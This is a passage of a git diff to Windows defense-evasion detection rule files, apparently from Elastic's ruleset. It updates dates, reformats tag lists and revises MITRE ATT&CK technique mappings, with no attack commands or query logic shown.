+[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml index 1512d6e2c06..852a9a680ae 100644 --- a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml +++ b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml @@ -4,7 +4,7 @@ integration = ["windows", "system"] maturity = "production" min_stack_comments = "ES|QL inline stats became generally available in 9.3.0, MV_CONTAINS is in preview since 9.2." min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -110,18 +110,34 @@ from logs-windows.forwarded*, logs-system.security* metadata _id, _version, _ind [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.001" +name = "Clear Windows Event Logs" +reference = "https://attack.mitre.org/techniques/T1070/001/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_clearing_windows_console_history.toml b/rules/windows/defense_evasion_clearing_windows_console_history.toml index 7e23d925997..f05d40e1010 100644 --- a/rules/windows/defense_evasion_clearing_windows_console_history.toml +++ b/rules/windows/defense_evasion_clearing_windows_console_history.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/22" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Austin Songer"] @@ -64,7 +64,21 @@ references = [ risk_score = 47 rule_id = "b5877334-677f-4fb9-86d5-a9721274223b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -87,18 +101,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.003" name = "Clear Command History" reference = "https://attack.mitre.org/techniques/T1070/003/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index 942482a1f80..c2f04f5a873 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -98,28 +98,24 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml index f8fae831aa8..7e89e09c3a2 100644 --- a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml +++ b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -126,18 +126,24 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" - [[rule.threat.technique.subtechnique]] id = "T1553.006" name = "Code Signing Policy Modification" reference = "https://attack.mitre.org/techniques/T1553/006/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml index 90f5cb482fd..bbf8c289d02 100644 --- a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml +++ b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -18,7 +18,17 @@ name = "Suspicious Communication App Child Process" risk_score = 47 rule_id = "adbfa3ee-777e-4747-b6b0-7bd645f30880" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "eql" @@ -227,31 +237,41 @@ Communication apps like Slack, WebEx, and Teams are integral to modern workflows [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_defender_disabled_via_registry.toml b/rules/windows/defense_evasion_defender_disabled_via_registry.toml index 14fbccc9270..6194cfb8572 100644 --- a/rules/windows/defense_evasion_defender_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_defender_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -108,7 +108,6 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -118,13 +117,20 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml index bfa1d4320b9..0666acac376 100644 --- a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml +++ b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -108,18 +108,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_disabling_windows_logs.toml b/rules/windows/defense_evasion_disabling_windows_logs.toml index 918d32f3d95..8a2c924a761 100644 --- a/rules/windows/defense_evasion_disabling_windows_logs.toml +++ b/rules/windows/defense_evasion_disabling_windows_logs.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/06" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic", "Ivan Ninichuck", "Austin Songer"] @@ -103,18 +103,34 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.001" +name = "Clear Windows Event Logs" +reference = "https://attack.mitre.org/techniques/T1070/001/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index 4d1b9d2f617..e6b5d148708 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,21 @@ note = """## Triage and analysis risk_score = 47 rule_id = "201200f1-a99b-43fb-88ed-f65a45c4972c" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -76,18 +90,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml index 36fa31a2960..f5b76cd15e6 100644 --- a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +++ b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/08" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,21 @@ references = ["https://www.joesandbox.com/analysis/476188/1/html"] risk_score = 73 rule_id = "416697ae-e468-4093-a93d-59661fa619ec" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,18 +100,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.002" name = "Control Panel" reference = "https://attack.mitre.org/techniques/T1218/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index 59086cf0516..2cc57b1fcb1 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml +++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -106,7 +106,21 @@ references = ["https://dtm.uk/wuauclt/"] risk_score = 47 rule_id = "edf8ee23-5ea7-4123-ba19-56b41e424ae3" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -124,13 +138,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index 15868ad4ecf..93810f62173 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,7 +85,21 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 73 rule_id = "c5dc3223-13a2-44a2-946c-e9dc0aa0449c" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -105,18 +119,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index 34687a32d2b..078583b84ea 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -54,7 +54,16 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -78,21 +87,49 @@ host.os.type:windows and event.category:process and event.type:start and ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index 6992af6d0a0..c2e91fd6574 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,21 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -77,18 +91,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml index 75f254895c1..084e10613d6 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -102,7 +102,19 @@ This rule checks for renamed instances of MSBuild, which can indicate an attempt risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -115,28 +127,29 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index 2f5cda9c602..ba363f8f52b 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -66,7 +66,17 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -78,31 